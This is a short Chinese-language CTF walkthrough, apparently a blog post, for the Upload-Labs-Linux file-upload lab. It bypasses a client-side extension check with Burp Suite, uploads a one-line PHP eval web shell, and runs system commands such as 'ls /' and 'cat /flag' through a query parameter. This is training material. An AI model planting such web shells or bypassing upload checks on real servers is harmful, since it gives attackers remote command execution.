Upload-Labs-Linux

文件上传漏洞

这里上传文件我们可以打开检查,可以看到该页面对上传文件做了相关的限定,但是只是在前端页面进行了相关的验证,后端不知道,但是我们可以试试绕过前端的校验,可以在设置中禁用javascript,也可以进行burpsuite进行抓包

这里使用抓包,上传的文件木马为获取该服务器的cmd权限

这里的校验为前端,我们上传木马文件

<?php @eval($_GET'cmd');?>木马文件需要后缀为jpg,这里使用burpsuite抓包后修改后缀后在发送

这里发送完成后就可以访问服务器了

检查一下是否拥有权限

核心代码

?cmd=phpinfo();

权限拥有,找到flag只需要查看该服务器的文件目录

核心代码

?cmd=system('ls /');

查看flag就好了

?cmd=system('cat /flag');

相关推荐
技术不好的崎鸣同学33 分钟前
[极客大挑战 2019]EasySQL 思路及解法
网络·安全·web安全
磐时信息技术1 小时前
GB 44495/44496正式施行:智能网联汽车信息安全与软件升级进入强制合规阶段
网络安全·信息安全·汽车·gb44495·gb44496
AI创界者2 小时前
【实战演练】基于 Kali Linux 的自动化漏洞扫描与安全加固指南
网络·安全·web安全
技术不好的崎鸣同学15 小时前
[ACTF2020 新生赛]Exec 思路及解法
算法·安全·web安全
被克制了19 小时前
安全协议设计与分析(2)
网络安全·密码学·安全协议
云水一下20 小时前
DVWA从入门到精通(十一):XSS (Stored)(存储型XSS)
web安全·xss·dvwa·存储型
介一安全1 天前
【SRC】基础思路篇10:越权与未授权访问完全指南
web安全·安全性测试·src·越权
Chockmans1 天前
春秋云境CVE-2021-42897(保姆级教学)
计算机网络·安全·web安全·网络安全·安全威胁分析·春秋云境·cve-2021-42897
四月天432 天前
web安全-SSTI(服务器模板注入)
笔记·学习·web安全·网络安全
菩提小狗2 天前
每日安全情报报告 · 2026-07-04
网络安全·漏洞·cve·安全情报·每日安全